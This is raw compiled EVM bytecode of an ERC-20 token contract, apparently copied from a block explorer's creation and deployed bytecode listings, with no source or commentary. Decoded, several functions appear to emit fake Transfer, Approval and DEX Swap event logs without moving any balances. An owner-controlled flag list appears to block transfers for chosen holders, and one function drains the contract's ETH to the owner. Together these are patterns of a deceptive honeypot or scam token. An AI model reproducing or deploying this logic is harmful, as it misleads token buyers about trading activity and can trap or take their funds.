18484620005eb565b505050565b5b818110156200065a576200064e6000826200061b565b60018101905062000638565b5050565b601f821115620006a95762000673816200051d565b6200067e8462000532565b810160208510156200068e578190505b620006a66200069d8562000532565b83018262000637565b50505b505050565b600082821c905092915050565b6000620006ce60001984600802620006ae565b1980831691505092915050565b6000620006e98383620006bb565b9150826002028217905092915050565b62000704826200047f565b67ffffffffffffffff81111562000720576200071f6200048a565b5b6200072c8254620004e8565b620007398282856200065e565b600060209050601f8311600181146200077157600084156200075c578287015190505b620007688582620006db565b865550620007d8565b601f19841662000781866200051d565b60005b82811015620007ab5784890151825560018201915060208501945060208101905062000784565b86831015620007cb5784890151620007c7601f891682620006bb565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b60018511156200086e57808604811115620008465762000845620007e0565b5b6001851615620008565780820291505b808102905062000866856200080f565b945062000826565b94509492505050565b6000826200088957600190506200095c565b816200089957600090506200095c565b8160018114620008b25760028114620008bd57620008f3565b60019150506200095c565b60ff841115620008d257620008d1620007e0565b5b8360020a915084821115620008ec57620008eb620007e0565b5b506200095c565b5060208310610133831016604e8410600b84101617156200092d5782820a905083811115620009275762000926620007e0565b5b6200095c565b6200093c84848460016200081c565b92509050818404811115620009565762000955620007e0565b5b81810290505b9392505050565b600060ff82169050919050565b60006200097d82620005a5565b91506200098a8362000963565b9250620009b97fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000877565b905092915050565b6000620009ce82620005a5565b9150620009db83620005a5565b9250828202620009eb81620005a5565b9150828204841483151762000a055762000a04620007e0565b5b5092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000a55601f8362000a0c565b915062000a628262000a1d565b602082019050919050565b6000602082019050818103600083015262000a888162000a46565b9050919050565b600062000a9c82620005a5565b915062000aa983620005a5565b925082820190508082111562000ac45762000ac3620007e0565b5b92915050565b62000ad581620005a5565b82525050565b600060208201905062000af2600083018462000aca565b92915050565b61351e8062000b086000396000f3fe608060405234801561001057600080fd5b50600436106101a95760003560e01c8063715018a6116100f9578063a9059cbb11610097578063c78052c611610071578063c78052c6146104b6578063dd62ed3e146104c0578063f2fde38b146104f0578063fb92b1801461050c576101a9565b8063a9059cbb1461044e578063b79c48e51461047e578063beabacc81461049a576101a9565b80638da5cb5b116100d35780638da5cb5b146103c657806395d89b41146103e4578063a1c617f514610402578063a457c2d71461041e576101a9565b8063715018a61461038457806377a1736b1461038e5780637aac697b146103aa576101a9565b806337c52806116101665780633e5beab9116101405780633e5beab9146102ec578063477e19441461031c57806370a08231146103385780637111a99414610368576101a9565b806337c528061461028457806338bf3cfa146102a057806339509351146102bc576101a9565b806306fdde03146101ae578063095ea7b3146101cc57806318160ddd146101fc5780631d63c0931461021a57806323b872dd14610236578063313ce56714610266575b600080fd5b6101b6610528565b6040516101c391906125fd565b60405180910390f35b6101e660048036038101906101e191906126bd565b6105ba565b6040516101f39190612718565b60405180910390f35b6102046105dd565b6040516102119190612742565b60405180910390f35b610234600480360381019061022f91906126bd565b6105e7565b005b610250600480360381019061024b919061275d565b610914565b60405161025d9190612718565b60405180910390f35b61026e610943565b60405161027b91906127cc565b60405180910390f35b61029e600480360381019061029991906128a2565b61094c565b005b6102ba60048036038101906102b59190612923565b610d1d565b005b6102d660048036038101906102d191906126bd565b610d69565b6040516102e39190612718565b60405180910390f35b61030660048036038101906103019190612923565b610da0565b6040516103139190612718565b60405180910390f35b61033660048036038101906103319190612950565b610df6565b005b610352600480360381019061034d9190612923565b610ea3565b60405161035f9190612742565b60405180910390f35b610382600480360381019061037d919061299d565b610eec565b005b61038c610fe2565b005b6103a860048036038101906103a39190612950565b610ff6565b005b6103c460048036038101906103bf9190612a51565b611180565b005b6103ce61130c565b6040516103db9190612ad4565b60405180910390f35b6103ec611335565b6040516103f991906125fd565b60405180910390f35b61041c60048036038101906104179190612a51565b6113c7565b005b610438600480360381019061043391906126bd565b611552565b6040516104459190612718565b60405180910390f35b610468600480360381019061046391906126bd565b6115c9565b6040516104759190612718565b60405180910390f35b610498600480360381019061049391906126bd565b6115ec565b005b6104b460048036038101906104af919061275d565b6118f5565b005b6104be61195f565b005b6104da60048036038101906104d59190612aef565b6119b0565b6040516104e79190612742565b60405180910390f35b61050a60048036038101906105059190612923565b611a37565b005b610526600480360381019061052191906128a2565b611aba565b005b60606006805461053790612b5e565b80601f016020809104026020016040519081016040528092919081815260200182805461056390612b5e565b80156105b05780601f10610585576101008083540402835291602001916105b0565b820191906000526020600020905b81548152906001019060200180831161059357829003601f168201915b5050505050905090565b6000806105c5611e4e565b90506105d2818585611e56565b600191505092915050565b6000600454905090565b6000600267ffffffffffffffff81111561060457610603612b8f565b5b6040519080825280602002602001820160405280156106325781602001602082028036833780820191505090505b509050308160008151811061064a57610649612bbe565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106f1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107159190612c02565b8160018151811061072957610728612bbe565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516107e29190612742565b60405180910390a3600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947670de0b6b3a764000060008430426040518663ffffffff1660e01b8152600401610856959493929190612d6d565b600060405180830381600087803b15801561087057600080fd5b505af1158015610884573d6000803e3d6000fd5b50505050600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516109079190612742565b60405180910390a3505050565b60008061091f611e4e565b905061092c85828561201f565b6109378585856120ab565b60019150509392505050565b60006012905090565b6000600267ffffffffffffffff81111561096957610968612b8f565b5b6040519080825280602002602001820160405280156109975781602001602082028036833780820191505090505b50905030816000815181106109af576109ae612bbe565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610a56573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610a7a9190612c02565b81600181518110610a8e57610a8d612bbe565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060005b85859050811015610d1557600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16868683818110610b2257610b21612bbe565b5b9050602002016020810190610b379190612923565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925868685818110610b8157610b80612bbe565b5b90506020020135604051610b959190612742565b60405180910390a3600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947670de0b6b3a764000060008530426040518663ffffffff1660e01b8152600401610c09959493929190612d6d565b600060405180830381600087803b158015610c2357600080fd5b505af1158015610c37573d6000803e3d6000fd5b50505050600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16868683818110610c8757610c86612bbe565b5b9050602002016020810190610c9c9190612923565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef868685818110610ce657610ce5612bbe565b5b90506020020135604051610cfa9190612742565b60405180910390a38080610d0d90612df6565b915050610acb565b505050505050565b610d25612421565b80600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600080610d74611e4e565b9050610d95818585610d8685896119b0565b610d909190612e3e565b611e56565b600191505092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b610dfe612421565b60005b82829050811015610e9e57600060026000858585818110610e2557610e24612bbe565b5b9050602002016020810190610e3a9190612923565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610e9690612df6565b915050610e01565b505050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60005b86869050811015610fd957848482818110610f0d57610f0c612bbe565b5b9050602002016020810190610f229190612923565b73ffffffffffffffffffffffffffffffffffffffff16878783818110610f4b57610f4a612bbe565b5b9050602002016020810190610f609190612923565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef858585818110610faa57610fa9612bbe565b5b90506020020135604051610fbe9190612742565b60405180910390a38080610fd190612df6565b915050610eef565b50505050505050565b610fea612421565b610ff4600061249f565b565b610ffe612421565b60005b8282905081101561117b5760016002600085858581811061102557611024612bbe565b5b905060200201602081019061103a9190612923565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168383838181106110d7576110d6612bbe565b5b90506020020160208101906110ec9190612923565b73ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92561115386868681811061113957611138612bbe565b5b905060200201602081019061114e9190612923565b610ea3565b6040516111609190612742565b60405180910390a3808061117390612df6565b915050611001565b505050565b60005b84849050811015611305578484828181106111a1576111a0612bbe565b5b90506020020160208101906111b69190612923565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82260008686600060405161123c9493929190612e72565b60405180910390a3600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168585838181106112905761128f612bbe565b5b90506020020160208101906112a59190612923565b73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040516112ea9190612742565b60405180910390a380806112fd90612df6565b915050611183565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606007805461134490612b5e565b80601f016020809104026020016040519081016040528092919081815260200182805461137090612b5e565b80156113bd5780601f10611392576101008083540402835291602001916113bd565b820191906000526020600020905b8154815290600101906020018083116113a057829003601f168201915b5050505050905090565b60005b8484905081101561154b578484828181106113e8576113e7612bbe565b5b90506020020160208101906113fd9190612923565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fd78ad95fa46c994b6551d0da85fc275fe613ce37657fb8d5e3d130840159d82285600080876040516114829493929190612eb7565b60405180910390a384848281811061149d5761149c612bbe565b5b90506020020160208101906114b29190612923565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516115309190612742565b60405180910390a3808061154390612df6565b9150506113ca565b5050505050565b60008061155d611e4e565b9050600061156b82866119b0565b9050838110156115b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115a790612f6e565b60405180910390fd5b6115bd8286868403611e56565b60019250505092915050565b6000806115d4611e4e565b90506115e18185856120ab565b600191505092915050565b6000600267ffffffffffffffff81111561160957611608612b8f565b5b6040519080825280602002602001820160405280156116375781602001602082028036833780820191505090505b509050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156116a7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906116cb9190612c02565b816000815181106116df576116de612bbe565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050308160018151811061172e5761172d612bbe565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc600a9081150290604051600060405180830381858888f193505050501580156117d1573d6000803e3d6000fd5b50600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947600a60018487426040518663ffffffff1660e01b8152600401611837959493929190613004565b600060405180830381600087803b15801561185157600080fd5b505af1158015611865573d6000803e3d6000fd5b505050508273ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516118e89190612742565b60405180910390a3505050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516119529190612742565b60405180910390a3505050565b611967612421565b3373ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f193505050501580156119ad573d6000803e3d6000fd5b50565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b611a3f612421565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611aae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611aa5906130d0565b60405180910390fd5b611ab78161249f565b50565b6000600267ffffffffffffffff811115611ad757611ad6612b8f565b5b604051908082528060200260200182016040528015611b055781602001602082028036833780820191505090505b509050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611b75573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611b999190612c02565b81600081518110611bad57611bac612bbe565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250503081600181518110611bfc57611bfb612bbe565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060005b85859050811015611e4657600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc600a9081150290604051600060405180830381858888f19350505050158015611cad573d6000803e3d6000fd5b50600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947600a6001858a8a87818110611d0457611d03612bbe565b5b9050602002016020810190611d199190612923565b426040518663ffffffff1660e01b8152600401611d3a959493929190613004565b600060405180830381600087803b158015611d5457600080fd5b505af1158015611d68573d6000803e3d6000fd5b50505050858582818110611d7f57611d7e612bbe565b5b9050602002016020810190611d949190612923565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef868685818110611e1757611e16612bbe565b5b90506020020135604051611e2b9190612742565b60405180910390a38080611e3e90612df6565b915050611c39565b505050505050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611ec5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ebc90613162565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611f34576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f2b906131f4565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516120129190612742565b60405180910390a3505050565b600061202b84846119b0565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146120a55781811015612097576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161208e90613260565b60405180910390fd5b6120a48484848403611e56565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361211a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612111906132f2565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612189576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161218090613384565b60405180910390fd5b612194838383612563565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561221b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161221290613416565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540192505081905550600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff168061234f5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156123ab5760011515600560009054906101000a900460ff161515146123aa576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016123a19061345c565b60405180910390fd5b5b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516124089190612742565b60405180910390a361241b848484612568565b50505050565b612429611e4e565b73ffffffffffffffffffffffffffffffffffffffff1661244761130c565b73ffffffffffffffffffffffffffffffffffffffff161461249d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612494906134c8565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b838110156125a757808201518184015260208101905061258c565b60008484015250505050565b6000601f19601f8301169050919050565b60006125cf8261256d565b6125d98185612578565b93506125e9818560208601612589565b6125f2816125b3565b840191505092915050565b6000602082019050818103600083015261261781846125c4565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061265482612629565b9050919050565b61266481612649565b811461266f57600080fd5b50565b6000813590506126818161265b565b92915050565b6000819050919050565b61269a81612687565b81146126a557600080fd5b50565b6000813590506126b781612691565b92915050565b600080604083850312156126d4576126d361261f565b5b60006126e285828601612672565b92505060206126f3858286016126a8565b9150509250929050565b60008115159050919050565b612712816126fd565b82525050565b600060208201905061272d6000830184612709565b92915050565b61273c81612687565b82525050565b60006020820190506127576000830184612733565b92915050565b6000806000606084860312156127765761277561261f565b5b600061278486828701612672565b935050602061279586828701612672565b92505060406127a6868287016126a8565b9150509250925092565b600060ff82169050919050565b6127c6816127b0565b82525050565b60006020820190506127e160008301846127bd565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f84011261280c5761280b6127e7565b5b8235905067ffffffffffffffff811115612829576128286127ec565b5b602083019150836020820283011115612845576128446127f1565b5b9250929050565b60008083601f840112612862576128616127e7565b5b8235905067ffffffffffffffff81111561287f5761287e6127ec565b5b60208301915083602082028301111561289b5761289a6127f1565b5b9250929050565b600080600080604085870312156128bc576128bb61261f565b5b600085013567ffffffffffffffff8111156128da576128d9612624565b5b6128e6878288016127f6565b9450945050602085013567ffffffffffffffff81111561290957612908612624565b5b6129158782880161284c565b925092505092959194509250565b6000602082840312156129395761293861261f565b5b600061294784828501612672565b91505092915050565b600080602083850312156129675761296661261f565b5b600083013567ffffffffffffffff81111561298557612984612624565b5b612991858286016127f6565b92509250509250929050565b600080600080600080606087890312156129ba576129b961261f565b5b600087013567ffffffffffffffff8111156129d8576129d7612624565b5b6129e489828a016127f6565b9650965050602087013567ffffffffffffffff811115612a0757612a06612624565b5b612a1389828a016127f6565b9450945050604087013567ffffffffffffffff811115612a3657612a35612624565b5b612a4289828a0161284c565b92509250509295509295509295565b60008060008060608587031215612a6b57612a6a61261f565b5b600085013567ffffffffffffffff811115612a8957612a88612624565b5b612a95878288016127f6565b94509450506020612aa8878288016126a8565b9250506040612ab9878288016126a8565b91505092959194509250565b612ace81612649565b82525050565b6000602082019050612ae96000830184612ac5565b92915050565b60008060408385031215612b0657612b0561261f565b5b6000612b1485828601612672565b9250506020612b2585828601612672565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680612b7657607f821691505b602082108103612b8957612b88612b2f565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050612bfc8161265b565b92915050565b600060208284031215612c1857612c1761261f565b5b6000612c2684828501612bed565b91505092915050565b6000819050919050565b6000819050919050565b6000612c5e612c59612c5484612c2f565b612c39565b612687565b9050919050565b612c6e81612c43565b82525050565b6000819050919050565b6000612c99612c94612c8f84612c74565b612c39565b612687565b9050919050565b612ca981612c7e565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b612ce481612649565b82525050565b6000612cf68383612cdb565b60208301905092915050565b6000602082019050919050565b6000612d1a82612caf565b612d248185612cba565b9350612d2f83612ccb565b8060005b83811015612d60578151612d478882612cea565b9750612d5283612d02565b925050600181019050612d33565b5085935050505092915050565b600060a082019050612d826000830188612c65565b612d8f6020830187612ca0565b8181036040830152612da18186612d0f565b9050612db06060830185612ac5565b612dbd6080830184612733565b9695505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000612e0182612687565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203612e3357612e32612dc7565b5b600182019050919050565b6000612e4982612687565b9150612e5483612687565b9250828201905080821115612e6c57612e6b612dc7565b5b92915050565b6000608082019050612e876000830187612ca0565b612e946020830186612733565b612ea16040830185612733565b612eae6060830184612ca0565b95945050505050565b6000608082019050612ecc6000830187612733565b612ed96020830186612ca0565b612ee66040830185612ca0565b612ef36060830184612733565b95945050505050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000612f58602583612578565b9150612f6382612efc565b604082019050919050565b60006020820190508181036000830152612f8781612f4b565b9050919050565b6000819050919050565b6000612fb3612fae612fa984612f8e565b612c39565b612687565b9050919050565b612fc381612f98565b82525050565b6000819050919050565b6000612fee612fe9612fe484612fc9565b612c39565b612687565b9050919050565b612ffe81612fd3565b82525050565b600060a0820190506130196000830188612fba565b6130266020830187612ff5565b81810360408301526130388186612d0f565b90506130476060830185612ac5565b6130546080830184612733565b9695505050505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006130ba602683612578565b91506130c58261305e565b604082019050919050565b600060208201905081810360008301526130e9816130ad565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061314c602483612578565b9150613157826130f0565b604082019050919050565b6000602082019050818103600083015261317b8161313f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006131de602283612578565b91506131e982613182565b604082019050919050565b6000602082019050818103600083015261320d816131d1565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061324a601d83612578565b915061325582613214565b602082019050919050565b600060208201905081810360008301526132798161323d565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006132dc602583612578565b91506132e782613280565b604082019050919050565b6000602082019050818103600083015261330b816132cf565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061336e602383612578565b915061337982613312565b604082019050919050565b6000602082019050818103600083015261339d81613361565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613400602683612578565b915061340b826133a4565b604082019050919050565b6000602082019050818103600083015261342f816133f3565b9050919050565b50565b6000613446600083612578565b915061345182613436565b600082019050919050565b6000602082019050818103600083015261347581613439565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006134b2602083612578565b91506134bd8261347c565b602082019050919050565b600060208201905081810360008301526134e1816134a5565b905091905056fea264697066735822122075183945bfda46a82a1b225ff15369a37fc53a5368a5e5607cf3a3b275b234a564736f6c63430008120033
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101a95760003560e01c8063715018a6116100f9578063a9059cbb11610097578063c78052c611610071578063c78052c6146104b6578063dd62ed3e146104c0578063f2fde38b146104f0578063fb92b1801461050c576101a9565b8063a9059cbb1461044e578063b79c48e51461047e578063beabacc81461049a576101a9565b80638da5cb5b116100d35780638da5cb5b146103c657806395d89b41146103e4578063a1c617f514610402578063a457c2d71461041e576101a9565b8063715018a61461038457806377a1736b1461038e5780637aac697b146103aa576101a9565b806337c52806116101665780633e5beab9116101405780633e5beab9146102ec578063477e19441461031c57806370a08231146103385780637111a99414610368576101a9565b806337c528061461028457806338bf3cfa146102a057806339509351146102bc576101a9565b806306fdde03146101ae578063095ea7b3146101cc57806318160ddd146101fc5780631d63c0931461021a57806323b872dd14610236578063313ce56714610266575b600080fd5b6101b6610528565b6040516101c391906125fd565b60405180910390f35b6101e660048036038101906101e191906126bd565b6105ba565b6040516101f39190612718565b60405180910390f35b6102046105dd565b6040516102119190612742565b60405180910390f35b610234600480360381019061022f91906126bd565b6105e7565b005b610250600480360381019061024b919061275d565b610914565b60405161025d9190612718565b60405180910390f35b61026e610943565b60405161027b91906127cc565b60405180910390f35b61029e600480360381019061029991906128a2565b61094c565b005b6102ba60048036038101906102b59190612923565b610d1d565b005b6102d660048036038101906102d191906126bd565b610d69565b6040516102e39190612718565b60405180910390f35b61030660048036038101906103019190612923565b610da0565b6040516103139190612718565b60405180910390f35b61033660048036038101906103319190612950565b610df6565b005b610352600480360381019061034d9190612923565b610ea3565b60405161035f9190612742565b60405180910390f35b610382600480360381019061037d919061299d565b610eec565b005b61038c610fe2565b005b6103a860048036038101906103a39190612950565b610ff6565b005b6103c460048036038101906103bf9190612a51565b611180565b005b6103ce61130c565b6040516103db9190612ad4565b60405180910390f35b6103ec611335565b6040516103f991906125fd565b60405180910390f35b61041c60048036038101906104179190612a51565b6113c7565b005b610438600480360381019061043391906126bd565b611552565b6040516104459190612718565b60405180910390f35b610468600480360381019061046391906126bd565b6115c9565b6040516104759190612718565b60405180910390f35b610498600480360381019061049391906126bd565b6115ec565b005b6104b460048036038101906104af919061275d565b6118f5565b005b6104be61195f565b005b6104da60048036038101906104d59190612aef565b6119b0565b6040516104e79190612742565b60405180910390f35b61050a60048036038101906105059190612923565b611a37565b005b610526600480360381019061052191906128a2565b611aba565b005b60606006805461053790612b5e565b80601f016020809104026020016040519081016040528092919081815260200182805461056390612b5e565b80156105b05780601f10610585576101008083540402835291602001916105b0565b820191906000526020600020905b81548152906001019060200180831161059357829003601f168201915b5050505050905090565b6000806105c5611e4e565b90506105d2818585611e56565b600191505092915050565b6000600454905090565b6000600267ffffffffffffffff81111561060457610603612b8f565b5b6040519080825280602002602001820160405280156106325781602001602082028036833780820191505090505b509050308160008151811061064a57610649612bbe565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b81526004016020604051